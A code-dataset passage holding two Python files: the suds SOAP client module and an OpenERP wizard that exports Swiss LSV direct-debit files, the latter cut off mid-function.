# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
The I{2nd generation} service proxy provides access to web services.
See I{README.txt}
"""
import suds
import suds.metrics as metrics
from cookielib import CookieJar
from suds import *
from suds.reader import DefinitionsReader
from suds.transport import TransportError, Request
from suds.transport.https import HttpAuthenticated
from suds.servicedefinition import ServiceDefinition
from suds import sudsobject
from sudsobject import Factory as InstFactory
from sudsobject import Object
from suds.resolver import PathResolver
from suds.builder import Builder
from suds.wsdl import Definitions
from suds.cache import ObjectCache
from suds.sax.document import Document
from suds.sax.parser import Parser
from suds.options import Options
from suds.properties import Unskin
from urlparse import urlparse
from copy import deepcopy
from suds.plugin import PluginContainer
from logging import getLogger
log = getLogger(__name__)
class Client(object):
"""
A lightweight web services client.
I{(2nd generation)} API.
@ivar wsdl: The WSDL object.
@type wsdl:L{Definitions}
@ivar service: The service proxy used to invoke operations.
@type service: L{Service}
@ivar factory: The factory used to create objects.
@type factory: L{Factory}
@ivar sd: The service definition
@type sd: L{ServiceDefinition}
@ivar messages: The last sent/received messages.
@type messages: str[2]
"""
@classmethod
def items(cls, sobject):
"""
Extract the I{items} from a suds object much like the
items() method works on I{dict}.
@param sobject: A suds object
@type sobject: L{Object}
@return: A list of items contained in I{sobject}.
@rtype: [(key, value),...]
"""
return sudsobject.items(sobject)
@classmethod
def dict(cls, sobject):
"""
Convert a sudsobject into a dictionary.
@param sobject: A suds object
@type sobject: L{Object}
@return: A python dictionary containing the
items contained in I{sobject}.
@rtype: dict
"""
return sudsobject.asdict(sobject)
@classmethod
def metadata(cls, sobject):
"""
Extract the metadata from a suds object.
@param sobject: A suds object
@type sobject: L{Object}
@return: The object's metadata
@rtype: L{sudsobject.Metadata}
"""
return sobject.__metadata__
def __init__(self, url, **kwargs):
"""
@param url: The URL for the WSDL.
@type url: str
@param kwargs: keyword arguments.
@see: L{Options}
"""
options = Options()
options.transport = HttpAuthenticated()
self.options = options
options.cache = ObjectCache(days=1)
self.set_options(**kwargs)
reader = DefinitionsReader(options, Definitions)
self.wsdl = reader.open(url)
plugins = PluginContainer(options.plugins)
plugins.init.initialized(wsdl=self.wsdl)
self.factory = Factory(self.wsdl)
self.service = ServiceSelector(self, self.wsdl.services)
self.sd = []
for s in self.wsdl.services:
sd = ServiceDefinition(self.wsdl, s)
self.sd.append(sd)
self.messages = dict(tx=None, rx=None)
def set_options(self, **kwargs):
"""
Set options.
@param kwargs: keyword arguments.
@see: L{Options}
"""
p = Unskin(self.options)
p.update(kwargs)
def add_prefix(self, prefix, uri):
"""
Add I{static} mapping of an XML namespace prefix to a namespace.
This is useful for cases when a wsdl and referenced schemas make heavy
use of namespaces and those namespaces are subject to changed.
@param prefix: An XML namespace prefix.
@type prefix: str
@param uri: An XML namespace URI.
@type uri: str
@raise Exception: when prefix is already mapped.
"""
root = self.wsdl.root
mapped = root.resolvePrefix(prefix, None)
if mapped is None:
root.addPrefix(prefix, uri)
return
if mapped[1] != uri:
raise Exception('"%s" already mapped as "%s"' % (prefix, mapped))
def last_sent(self):
"""
Get last sent I{soap} message.
@return: The last sent I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('tx')
def last_received(self):
"""
Get last received I{soap} message.
@return: The last received I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('rx')
def clone(self):
"""
Get a shallow clone of this object.
The clone only shares the WSDL. All other attributes are
unique to the cloned object including options.
@return: A shallow clone.
@rtype: L{Client}
"""
class Uninitialized(Client):
def __init__(self):
pass
clone = Uninitialized()
clone.options = Options()
cp = Unskin(clone.options)
mp = Unskin(self.options)
cp.update(deepcopy(mp))
clone.wsdl = self.wsdl
clone.factory = self.factory
clone.service = ServiceSelector(clone, self.wsdl.services)
clone.sd = self.sd
clone.messages = dict(tx=None, rx=None)
return clone
def __str__(self):
return unicode(self)
def __unicode__(self):
s = ['\n']
build = suds.__build__.split()
s.append('Suds ( https://fedorahosted.org/suds/ )')
s.append(' version: %s' % suds.__version__)
s.append(' %s build: %s' % (build[0], build[1]))
for sd in self.sd:
s.append('\n\n%s' % unicode(sd))
return ''.join(s)
class Factory:
"""
A factory for instantiating types defined in the wsdl
@ivar resolver: A schema type resolver.
@type resolver: L{PathResolver}
@ivar builder: A schema object builder.
@type builder: L{Builder}
"""
def __init__(self, wsdl):
"""
@param wsdl: A schema object.
@type wsdl: L{wsdl.Definitions}
"""
self.wsdl = wsdl
self.resolver = PathResolver(wsdl)
self.builder = Builder(self.resolver)
def create(self, name):
"""
create a WSDL type by name
@param name: The name of a type defined in the WSDL.
@type name: str
@return: The requested object.
@rtype: L{Object}
"""
timer = metrics.Timer()
timer.start()
type = self.resolver.find(name)
if type is None:
raise TypeNotFound(name)
if type.enum():
result = InstFactory.object(name)
for e, a in type.children():
setattr(result, e.name, e.name)
else:
try:
result = self.builder.build(type)
except Exception, e:
log.error("create '%s' failed", name, exc_info=True)
raise BuildError(name, e)
timer.stop()
metrics.log.debug('%s created: %s', name, timer)
return result
def separator(self, ps):
"""
Set the path separator.
@param ps: The new path separator.
@type ps: char
"""
self.resolver = PathResolver(self.wsdl, ps)
class ServiceSelector:
"""
The B{service} selector is used to select a web service.
In most cases, the wsdl only defines (1) service in which access
by subscript is passed through to a L{PortSelector}. This is also the
behavior when a I{default} service has been specified. In cases
where multiple services have been defined and no default has been
specified, the service is found by name (or index) and a L{PortSelector}
for the service is returned. In all cases, attribute access is
forwarded to the L{PortSelector} for either the I{first} service or the
I{default} service (when specified).
@ivar __client: A suds client.
@type __client: L{Client}
@ivar __services: A list of I{wsdl} services.
@type __services: list
"""
def __init__(self, client, services):
"""
@param client: A suds client.
@type client: L{Client}
@param services: A list of I{wsdl} services.
@type services: list
"""
self.__client = client
self.__services = services
def __getattr__(self, name):
"""
Request to access an attribute is forwarded to the
L{PortSelector} for either the I{first} service or the
I{default} service (when specified).
@param name: The name of a method.
@type name: str
@return: A L{PortSelector}.
@rtype: L{PortSelector}.
"""
default = self.__ds()
if default is None:
port = self.__find(0)
else:
port = default
return getattr(port, name)
def __getitem__(self, name):
"""
Provides selection of the I{service} by name (string) or
index (integer). In cases where only (1) service is defined
or a I{default} has been specified, the request is forwarded
to the L{PortSelector}.
@param name: The name (or index) of a service.
@type name: (int|str)
@return: A L{PortSelector} for the specified service.
@rtype: L{PortSelector}.
"""
if len(self.__services) == 1:
port = self.__find(0)
return port[name]
default = self.__ds()
if default is not None:
port = default
return port[name]
return self.__find(name)
def __find(self, name):
"""
Find a I{service} by name (string) or index (integer).
@param name: The name (or index) of a service.
@type name: (int|str)
@return: A L{PortSelector} for the found service.
@rtype: L{PortSelector}.
"""
service = None
if not len(self.__services):
raise Exception, 'No services defined'
if isinstance(name, int):
try:
service = self.__services[name]
name = service.name
except IndexError:
raise ServiceNotFound, 'at [%d]' % name
else:
for s in self.__services:
if name == s.name:
service = s
break
if service is None:
raise ServiceNotFound, name
return PortSelector(self.__client, service.ports, name)
def __ds(self):
"""
Get the I{default} service if defined in the I{options}.
@return: A L{PortSelector} for the I{default} service.
@rtype: L{PortSelector}.
"""
ds = self.__client.options.service
if ds is None:
return None
else:
return self.__find(ds)
class PortSelector:
"""
The B{port} selector is used to select a I{web service} B{port}.
In cases where multiple ports have been defined and no default has been
specified, the port is found by name (or index) and a L{MethodSelector}
for the port is returned. In all cases, attribute access is
forwarded to the L{MethodSelector} for either the I{first} port or the
I{default} port (when specified).
@ivar __client: A suds client.
@type __client: L{Client}
@ivar __ports: A list of I{service} ports.
@type __ports: list
@ivar __qn: The I{qualified} name of the port (used for logging).
@type __qn: str
"""
def __init__(self, client, ports, qn):
"""
@param client: A suds client.
@type client: L{Client}
@param ports: A list of I{service} ports.
@type ports: list
@param qn: The name of the service.
@type qn: str
"""
self.__client = client
self.__ports = ports
self.__qn = qn
def __getattr__(self, name):
"""
Request to access an attribute is forwarded to the
L{MethodSelector} for either the I{first} port or the
I{default} port (when specified).
@param name: The name of a method.
@type name: str
@return: A L{MethodSelector}.
@rtype: L{MethodSelector}.
"""
default = self.__dp()
if default is None:
m = self.__find(0)
else:
m = default
return getattr(m, name)
def __getitem__(self, name):
"""
Provides selection of the I{port} by name (string) or
index (integer). In cases where only (1) port is defined
or a I{default} has been specified, the request is forwarded
to the L{MethodSelector}.
@param name: The name (or index) of a port.
@type name: (int|str)
@return: A L{MethodSelector} for the specified port.
@rtype: L{MethodSelector}.
"""
default = self.__dp()
if default is None:
return self.__find(name)
else:
return default
def __find(self, name):
"""
Find a I{port} by name (string) or index (integer).
@param name: The name (or index) of a port.
@type name: (int|str)
@return: A L{MethodSelector} for the found port.
@rtype: L{MethodSelector}.
"""
port = None
if not len(self.__ports):
raise Exception, 'No ports defined: %s' % self.__qn
if isinstance(name, int):
qn = '%s[%d]' % (self.__qn, name)
try:
port = self.__ports[name]
except IndexError:
raise PortNotFound, qn
else:
qn = '.'.join((self.__qn, name))
for p in self.__ports:
if name == p.name:
port = p
break
if port is None:
raise PortNotFound, qn
qn = '.'.join((self.__qn, port.name))
return MethodSelector(self.__client, port.methods, qn)
def __dp(self):
"""
Get the I{default} port if defined in the I{options}.
@return: A L{MethodSelector} for the I{default} port.
@rtype: L{MethodSelector}.
"""
dp = self.__client.options.port
if dp is None:
return None
else:
return self.__find(dp)
class MethodSelector:
"""
The B{method} selector is used to select a B{method} by name.
@ivar __client: A suds client.
@type __client: L{Client}
@ivar __methods: A dictionary of methods.
@type __methods: dict
@ivar __qn: The I{qualified} name of the method (used for logging).
@type __qn: str
"""
def __init__(self, client, methods, qn):
"""
@param client: A suds client.
@type client: L{Client}
@param methods: A dictionary of methods.
@type methods: dict
@param qn: The I{qualified} name of the port.
@type qn: str
"""
self.__client = client
self.__methods = methods
self.__qn = qn
def __getattr__(self, name):
"""
Get a method by name and return it in an I{execution wrapper}.
@param name: The name of a method.
@type name: str
@return: An I{execution wrapper} for the specified method name.
@rtype: L{Method}
"""
return self[name]
def __getitem__(self, name):
"""
Get a method by name and return it in an I{execution wrapper}.
@param name: The name of a method.
@type name: str
@return: An I{execution wrapper} for the specified method name.
@rtype: L{Method}
"""
m = self.__methods.get(name)
if m is None:
qn = '.'.join((self.__qn, name))
raise MethodNotFound, qn
return Method(self.__client, m)
class Method:
"""
The I{method} (namespace) object.
@ivar client: A client object.
@type client: L{Client}
@ivar method: A I{wsdl} method.
@type I{wsdl} Method.
"""
def __init__(self, client, method):
"""
@param client: A client object.
@type client: L{Client}
@param method: A I{raw} method.
@type I{raw} Method.
"""
self.client = client
self.method = method
def __call__(self, *args, **kwargs):
"""
Invoke the method.
"""
clientclass = self.clientclass(kwargs)
client = clientclass(self.client, self.method)
if not self.faults():
try:
return client.invoke(args, kwargs)
except WebFault, e:
return (500, e)
else:
return client.invoke(args, kwargs)
def faults(self):
""" get faults option """
return self.client.options.faults
def clientclass(self, kwargs):
""" get soap client class """
if SimClient.simulation(kwargs):
return SimClient
else:
return SoapClient
class SoapClient:
"""
A lightweight soap based web client B{**not intended for external use}
@ivar service: The target method.
@type service: L{Service}
@ivar method: A target method.
@type method: L{Method}
@ivar options: A dictonary of options.
@type options: dict
@ivar cookiejar: A cookie jar.
@type cookiejar: libcookie.CookieJar
"""
def __init__(self, client, method):
"""
@param client: A suds client.
@type client: L{Client}
@param method: A target method.
@type method: L{Method}
"""
self.client = client
self.method = method
self.options = client.options
self.cookiejar = CookieJar()
def invoke(self, args, kwargs):
"""
Send the required soap message to invoke the specified method
@param args: A list of args for the method invoked.
@type args: list
@param kwargs: Named (keyword) args for the method invoked.
@type kwargs: dict
@return: The result of the method invocation.
@rtype: I{builtin}|I{subclass of} L{Object}
"""
timer = metrics.Timer()
timer.start()
result = None
binding = self.method.binding.input
attributes = kwargs.get('attributes', None)
if attributes:
del kwargs['attributes']
soapenv = binding.get_message(self.method, args, kwargs, attributes)
timer.stop()
metrics.log.debug(
"message for '%s' created: %s",
self.method.name,
timer)
timer.start()
result = self.send(soapenv)
timer.stop()
metrics.log.debug(
"method '%s' invoked: %s",
self.method.name,
timer)
return result
def send(self, soapenv):
"""
Send soap message.
@param soapenv: A soap envelope to send.
@type soapenv: L{Document}
@return: The reply to the sent message.
@rtype: I{builtin} or I{subclass of} L{Object}
"""
result = None
location = self.location()
binding = self.method.binding.input
transport = self.options.transport
retxml = self.options.retxml
nosend = self.options.nosend
prettyxml = self.options.prettyxml
timer = metrics.Timer()
log.debug('sending to (%s)\nmessage:\n%s', location, soapenv)
try:
self.last_sent(soapenv)
plugins = PluginContainer(self.options.plugins)
plugins.message.marshalled(envelope=soapenv.root())
if prettyxml:
soapenv = soapenv.str()
else:
soapenv = soapenv.plain()
soapenv = soapenv.encode('utf-8')
ctx = plugins.message.sending(envelope=soapenv)
soapenv = ctx.envelope
if nosend:
return RequestContext(self, binding, soapenv)
request = Request(location, soapenv)
request.headers = self.headers()
timer.start()
reply = transport.send(request)
timer.stop()
metrics.log.debug('waited %s on server reply', timer)
ctx = plugins.message.received(reply=reply.message)
reply.message = ctx.reply
if retxml:
result = reply.message
else:
result = self.succeeded(binding, reply.message)
except TransportError, e:
if e.httpcode in (202,204):
result = None
else:
log.error(self.last_sent())
result = self.failed(binding, e)
return result
def headers(self):
"""
Get http headers or the http/https request.
@return: A dictionary of header/values.
@rtype: dict
"""
action = self.method.soap.action
if isinstance(action, unicode):
action = action.encode('utf-8')
stock = { 'Content-Type' : 'text/xml; charset=utf-8', 'SOAPAction': action }
result = dict(stock, **self.options.headers)
log.debug('headers = %s', result)
return result
def succeeded(self, binding, reply):
"""
Request succeeded, process the reply
@param binding: The binding to be used to process the reply.
@type binding: L{bindings.binding.Binding}
@param reply: The raw reply text.
@type reply: str
@return: The method result.
@rtype: I{builtin}, L{Object}
@raise WebFault: On server.
"""
log.debug('http succeeded:\n%s', reply)
plugins = PluginContainer(self.options.plugins)
if len(reply) > 0:
reply, result = binding.get_reply(self.method, reply)
self.last_received(reply)
else:
result = None
ctx = plugins.message.unmarshalled(reply=result)
result = ctx.reply
if self.options.faults:
return result
else:
return (200, result)
def failed(self, binding, error):
"""
Request failed, process reply based on reason
@param binding: The binding to be used to process the reply.
@type binding: L{suds.bindings.binding.Binding}
@param error: The http error message
@type error: L{transport.TransportError}
"""
status, reason = (error.httpcode, tostr(error))
reply = error.fp.read()
log.debug('http failed:\n%s', reply)
if status == 500:
if len(reply) > 0:
r, p = binding.get_fault(reply)
self.last_received(r)
return (status, p)
else:
return (status, None)
if self.options.faults:
raise Exception((status, reason))
else:
return (status, None)
def location(self):
p = Unskin(self.options)
return p.get('location', self.method.location)
def last_sent(self, d=None):
key = 'tx'
messages = self.client.messages
if d is None:
return messages.get(key)
else:
messages[key] = d
def last_received(self, d=None):
key = 'rx'
messages = self.client.messages
if d is None:
return messages.get(key)
else:
messages[key] = d
class SimClient(SoapClient):
"""
Loopback client used for message/reply simulation.
"""
injkey = '__inject'
@classmethod
def simulation(cls, kwargs):
""" get whether loopback has been specified in the I{kwargs}. """
return kwargs.has_key(SimClient.injkey)
def invoke(self, args, kwargs):
"""
Send the required soap message to invoke the specified method
@param args: A list of args for the method invoked.
@type args: list
@param kwargs: Named (keyword) args for the method invoked.
@type kwargs: dict
@return: The result of the method invocation.
@rtype: I{builtin} or I{subclass of} L{Object}
"""
simulation = kwargs[self.injkey]
msg = simulation.get('msg')
reply = simulation.get('reply')
fault = simulation.get('fault')
if msg is None:
if reply is not None:
return self.__reply(reply, args, kwargs)
if fault is not None:
return self.__fault(fault)
raise Exception('(reply|fault) expected when msg=None')
sax = Parser()
msg = sax.parse(string=msg)
return self.send(msg)
def __reply(self, reply, args, kwargs):
""" simulate the reply """
binding = self.method.binding.input
msg = binding.get_message(self.method, args, kwargs)
log.debug('inject (simulated) send message:\n%s', msg)
binding = self.method.binding.output
return self.succeeded(binding, reply)
def __fault(self, reply):
""" simulate the (fault) reply """
binding = self.method.binding.output
if self.options.faults:
r, p = binding.get_fault(reply)
self.last_received(r)
return (500, p)
else:
return (500, None)
class RequestContext:
"""
A request context.
Returned when the ''nosend'' options is specified.
@ivar client: The suds client.
@type client: L{Client}
@ivar binding: The binding for this request.
@type binding: I{Binding}
@ivar envelope: The request soap envelope.
@type envelope: str
"""
def __init__(self, client, binding, envelope):
"""
@param client: The suds client.
@type client: L{Client}
@param binding: The binding for this request.
@type binding: I{Binding}
@param envelope: The request soap envelope.
@type envelope: str
"""
self.client = client
self.binding = binding
self.envelope = envelope
def succeeded(self, reply):
"""
Re-entry for processing a successful reply.
@param reply: The reply soap envelope.
@type reply: str
@return: The returned value for the invoked method.
@rtype: object
"""
options = self.client.options
plugins = PluginContainer(options.plugins)
ctx = plugins.message.received(reply=reply)
reply = ctx.reply
return self.client.succeeded(self.binding, reply)
def failed(self, error):
"""
Re-entry for processing a failure reply.
@param error: The error returned by the transport.
@type error: A suds I{TransportError}.
"""
return self.client.failed(self.binding, error)
| prezi/prezi-suds | suds/client.py | Python | lgpl-3.0 | 28,017 | 0.002498 |
##############################################################################
#
# Swiss localization Direct Debit module for OpenERP
# Copyright (C) 2014 Compassion (http://www.compassion.ch)
# @author: Cyril Sester <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import collections
from openerp import models, fields, api, _, netsvc, exceptions
from datetime import date, datetime, timedelta
from openerp.tools import mod10r, DEFAULT_SERVER_DATE_FORMAT
import logging
logger = logging.getLogger(__name__)
class lsv_export_wizard(models.TransientModel):
''' LSV file generation wizard. This wizard is called
when the "make payment" button on a direct debit order
with payment type "LSV" is pressed
'''
_name = 'lsv.export.wizard'
_description = 'Export LSV Direct Debit File'
treatment_type = fields.Selection(
[('P', _('Production')), ('T', _('Test'))],
_('Treatment type'),
required=True,
default='T' # FIXME for release
)
currency = fields.Selection(
[('CHF', 'CHF'), ('EUR', 'EUR')],
_('Currency'),
required=True,
default='CHF'
)
banking_export_ch_dd_id = fields.Many2one(
'banking.export.ch.dd',
_('LSV file'),
readonly=True
)
file = fields.Binary(
string=_('File'),
related='banking_export_ch_dd_id.file'
)
filename = fields.Char(
string=_('Filename'),
related='banking_export_ch_dd_id.filename',
size=256,
readonly=True
)
nb_transactions = fields.Integer(
string=_('Number of Transactions'),
related='banking_export_ch_dd_id.nb_transactions'
)
total_amount = fields.Float(
string=_('Total Amount'),
related='banking_export_ch_dd_id.total_amount'
)
state = fields.Selection(
[('create', _('Create')), ('finish', _('Finish'))],
_('State'),
readonly=True,
default='create'
)
@api.multi
def generate_lsv_file(self):
''' Generate direct debit export object including the lsv file
content. Called by generate button.
'''
self.ensure_one()
payment_order_obj = self.env['payment.order']
payment_line_obj = self.env['payment.line']
active_ids = self.env.context.get('active_ids', [])
if not active_ids:
raise exceptions.ValidationError(_('No payment order selected'))
payment_order_ids = payment_order_obj.browse(active_ids)
# common properties for all lines
properties = self._setup_properties(payment_order_ids[0])
total_amount = 0.0
lsv_lines = []
for payment_order in payment_order_ids:
total_amount = total_amount + payment_order.total
ben_bank_id = payment_order.mode.bank_id
clean_acc_number = ben_bank_id.acc_number.replace(' ', '')
clean_acc_number = clean_acc_number.replace('-', '')
ben_address = self._get_account_address(ben_bank_id)
properties.update({
'ben_address': ben_address,
'ben_iban': clean_acc_number,
'ben_clearing': self._get_clearing(payment_order.mode.bank_id),
})
if not self._is_ch_li_iban(properties.get('ben_iban')):
raise exceptions.ValidationError(
_('Ben IBAN is not a correct CH or LI IBAN (%s given)') %
properties.get('ben_iban')
)
order_by = ''
if payment_order.date_prefered == 'due':
order_by = 'account_move_line.date_maturity ASC, '
order_by += 'payment_line.bank_id'
# A direct db query is used because order parameter in model.search
# doesn't support function fields
self.env.cr.execute(
'SELECT payment_line.id FROM payment_line, account_move_line '
'WHERE payment_line.move_line_id = account_move_line.id '
'AND payment_line.order_id = %s '
'ORDER BY ' + order_by, (payment_order.id,))
sorted_line_ids = [row[0] for row in self.env.cr.fetchall()]
payment_lines = payment_line_obj.browse(sorted_line_ids)
for line in payment_lines:
if not line.mandate_id or not line.mandate_id.state == "valid":
raise exceptions.ValidationError(
_('Line with ref %s has no associated valid mandate') %
line.name
)
# Payment line is associated to generated line to make
# customizing easier.
lsv_lines.append((line, self._generate_debit_line(
line, properties, payment_order)))
properties.update({'seq_nb': properties['seq_nb'] + 1})
lsv_lines.append((None, self._generate_total_line(properties,
total_amount)))
lsv_lines = self._customize_lines(lsv_lines, properties)
file_content = ''.join(lsv_lines) # Concatenate all lines
file_content = ''.join(
[ch if ord(ch) < 128 else '?' for ch in file_content])
export_id = self._create_lsv_export(active_ids,
total_amount,
properties,
file_content)
self.write({'banking_export_ch_dd_id': export_id.id,
'state': 'finish'})
action = {
'name': 'Generated File',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': self._name,
'res_id': self.id,
'target': 'new',
}
return action
@api.model
def _generate_debit_line(self, line, properties, payment_order):
''' Convert each payment_line to lsv debit line '''
deb_acc_number = line.bank_id.acc_number
deb_acc_number = deb_acc_number.replace(' ', '').replace('-', '')
if line.bank_id.state == 'iban' and not self._is_ch_li_iban(
deb_acc_number):
raise exceptions.ValidationError(
_('Line with ref %s has not a correct CH or LI IBAN'
'(%s given)') % (line.name, deb_acc_number)
)
vals = collections.OrderedDict()
vals['TA'] = '875'
vals['VNR'] = '0'
vals['VART'] = properties.get('treatment_type', 'P')
vals['GVDAT'] = self._prepare_date(
self._get_treatment_date(payment_order.date_prefered,
line.ml_maturity_date,
payment_order.date_scheduled,
line.name))
vals['BCZP'] = self._complete_line(
self._get_clearing(line.bank_id), 5)
vals['EDAT'] = properties.get('edat')
vals['BCZE'] = self._complete_line(properties.get('ben_clearing'), 5)
vals['ABSID'] = properties.get('lsv_identifier')
vals['ESEQ'] = str(properties.get('seq_nb')).zfill(7)
vals['LSVID'] = properties.get('lsv_identifier')
self._check_currency(line, properties)
vals['WHG'] = properties.get('currency', 'CHF')
self._check_amount(line, properties)
vals['BETR'] = self._format_number(line.amount_currency, 12)
vals['KTOZE'] = self._complete_line(properties.get('ben_iban'), 34)
vals['ADRZE'] = properties.get('ben_address')
vals['KTOZP'] = self._complete_line(deb_acc_number, 34)
vals['ADRZP'] = self._get_account_address(line.bank_id)
vals['MITZP'] = self._complete_line(self._get_communications(line),
140)
ref, ref_type = self._get_ref(line)
vals['REFFL'] = ref_type
vals['REFNR'] = self._complete_line(ref, 27)
if vals['REFFL'] == 'A':
if not properties.get('esr_party_number'):
raise exceptions.ValidationError(
_('Line with ref %s has ESR ref, but no valid '
'ESR party number exists for ben account') %
line.name
)
vals['ESRTN'] = self._complete_line(
properties.get('esr_party_number'),
9)
else:
vals['ESRTN'] = self._complete_line('', 9)
gen_line = ''.join(vals.values())
if len(gen_line) == 588: # Standard 875 line size
return gen_line
else:
raise exceptions.Warning(
_('Generated line for ref %s with size %d is not valid '
'(len should be 588)') %
(line.name, len(gen_line))
)
def _generate_total_line(self, properties, total_amount):
''' Generate total line according to total amount and properties '''
vals = collections.OrderedDict()
vals['TA'] = '890'
vals['VNR'] = '0'
vals['EDAT'] = properties.get('edat')
vals['ABSID'] = properties.get('lsv_identifier')
vals['ESEQ'] = str(properties.get('seq_nb')).zfill(7)
vals['WHG'] = properties.get('currency', 'CHF')
vals['TBETR'] = self._format_number(total_amount, 16)
line = ''.join(vals.values())
if len(line) == 43:
return line
else:
raise exceptions.Warning(
_('Generated total line is not valid (%d instead of 43)') %
len(line)
)
def _create_lsv_export(self, p_o_ids, total_amount,
properties, file_content):
''' Create banking.export.ch.dd object '''
banking_export_ch_dd_obj = self.env['banking.export.ch.dd']
vals = {
'payment_order_ids': [(6, 0, [p_o_id for p_o_id in p_o_ids])],
'total_amount': total_amount,
# Substract 1 for total line
'nb_transactions': properties.get('seq_nb') - 1,
'file': base64.encodestring(file_content),
'type': 'LSV',
}
export_id = banking_export_ch_dd_obj.create(vals)
return export_id
@api.multi
def confirm_export(self):
''' Save the exported LSV file: mark all payments in the file
as 'sent'. Write 'last debit date' on mandate.
'''
self.banking_export_ch_dd_id.write({'state': 'sent'})
wf_service = netsvc.LocalService('workflow')
today_str = datetime.today().strftime(DEFAULT_SERVER_DATE_FORMAT)
for order in self.banking_export_ch_dd_id.payment_order_ids:
wf_service.trg_validate(self.env.uid, 'payment.order',
order.id, 'done', self.env.cr)
mandate_ids = list(set(
[line.mandate_id.id for line in order.line_ids]))
mandates = self.env['account.banking.mandate'].browse(mandate_ids)
mandates.write({'last_debit_date': today_str})
# redirect to generated lsv export
action = {
'name': 'Generated File',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'banking.export.ch.dd',
'res_id': self.banking_export_ch_dd_id.id,
'target': 'current',
}
return action
@api.multi
def cancel_export(self):
''' Cancel the export: delete export record '''
self.banking_export_ch_dd_id.unlink()
return {'type': 'ir.actions.act_window_close'}
@api.model
def _customize_lines(self, lsv_lines, properties):
''' Use this if you want to customize the generated lines.
@param lsv_lines: list of tuples with tup[0]=payment line
and tup[1]=generated string.
@return: list of strings.
'''
return [tup[1] for tup in lsv_lines]
##########################
# Tools #
##########################
def _check_amount(self, line, properties):
''' Max allowed amount is CHF 99'999'999.99.
We need to also check EUR values...
'''
if (properties.get('currency') == 'CHF' and
line.amount_currency > 99999999.99) or (
properties.get('currency') == 'EUR' and
line.amount_currency > 99999999.99 / properties.get('rate')):
raise exceptions.ValidationError(
_('Stop kidding... max authorized amount is CHF 99 999 999.99 '
'(%.2f %s given for ref %s)') %
(line.amount_currency, properties.get('currency'), line.name))
elif line.amount_currency <= 0:
raise exceptions.ValidationError(
_('Amount for line with ref %s is negative (%f given)') %
(line.name, line.amount_currency))
def _check_currency(self, line, properties):
''' Check that line currency is equal to lsv export currency '''
if not line.currency.name == properties.get(
'currency'): # All currencies have to be the same !
raise exceptions.ValidationError(
_('Line with ref %s has %s currency and lsv file %s '
'(should be the same)') %
(line.name, line.currency.name, properties.get(
'currency', '')))
def _complete_line(self, string, nb_char):
''' In LSV file each field has a defined length.
This way, lines have to be filled with spaces
'''
if len(string) > nb_char:
return string[:nb_char]
return string.ljust(nb_char)
def _format_number(self, amount, nb_char):
''' Accepted formats are "00000000123,", "0000000123,1"
and "000000123,46".
This function always returns the last format
'''
amount_str = '{:.2f}'.format(amount).replace('.', ',').zfill(nb_char)
return amount_str
def _get_account_address(self, bank_account):
''' Return account address for given bank_account.
First 2 lines are mandatory !
'''
if bank_account.owner_name:
bank_line1 = bank_account.owner_name
else:
raise exceptions.ValidationError(
_('Missing owner name for bank account %s')
% bank_account.acc_number)
bank_line2 = bank_account.street if bank_account.street else ''
bank_line3 = bank_account.zip + ' ' + bank_account.city \
if bank_account.zip and bank_account.city else ''
bank_line4 = bank_account.country_id.name \
if bank_account.country_id else ''
# line2 is empty, we try to fill with something else
if not bank_line2:
if bank_line3:
bank_line2 = bank_line3
bank_line3 = bank_line4
bank_line4 = ''
elif bank_line4:
bank_line2 = bank_line4
bank_line4 = ''
else:
raise exceptions.ValidationError(
_('Missing address for bank account %s')
% bank_account.acc_number)
return (self._complete_line(bank_line1, 35) +
self._complete_line(bank_line2, 35) +
self._complete_line(bank_line3, 35) +
self._complete_line(bank_line4, 35))
def _get_clearing(self, bank_account):
clearing = ''
if bank_account.bank.clearing:
clearing = bank_account.bank.clearing
elif bank_account.state == 'iban':
clean_acc_number = bank_account.acc_number.replace(" ", "")
# Clearing number is always 5 chars and starts at position 5
# (4 in machine-index) in CH-iban
clearing = str(int(clean_acc_number[4:9]))
else:
raise exceptions.ValidationError(
_('Unable to determine clearing number for account %s') %
bank_account.acc_number)
return clearing
def _get_communications(self, line):
''' This method can be overloaded to fit your communication style '''
return ''
def _get_ref(self, payment_line):
if self._is_bvr_ref(payment_line.move_line_id.transaction_ref):
return payment_line.move_line_id.transaction_ref.replace(
' ', '').rjust(27, '0'), 'A'
return '', 'B' # If anyone uses IPI reference, get it here
def _is_bvr_ref(self, ref):
if not ref:
return False # Empty is not valid
clean_ref = ref.replace(' ', '')
if not clean_ref.isdigit() or len(clean_ref) > 27:
return False
clean_ref = clean_ref.rjust(27, '0') # Add zeros to the left
if not clean_ref == mod10r(clean_ref[0:26]):
return False
return True
def _get_treatment_date(self, prefered_type, line_mat_date,
order_sched_date, name):
''' Returns appropriate date according to payment_order and
payment_order_line data.
Raises an error if treatment date is > today+30 or < today-10
'''
requested_date = date.today()
if prefered_type == 'due':
tmp_date = datetime.strptime(
line_mat_date, DEFAULT_SERVER_DATE_FORMAT
).date()
requested_date = tmp_date if tmp_date else requested_date
elif prefered_type == 'fixed':
tmp_date = datetime.strptime(
order_sched_date, DEFAULT_SERVER_DATE_FORMAT
).date()
requested_date = tmp_date if tmp_date else requested_date
if requested_date > date.today() + timedelta(days=30) \
or requested_date < date.today() - timedelta(days=10):
raise exceptions.ValidationError(
_('Incorrect treatment date: %s for line with ref %s')
% (requested_date, name))
return requested_date
def _is_ch_li_iban(self, iban):
''' Check if given iban is valid ch or li iban '''
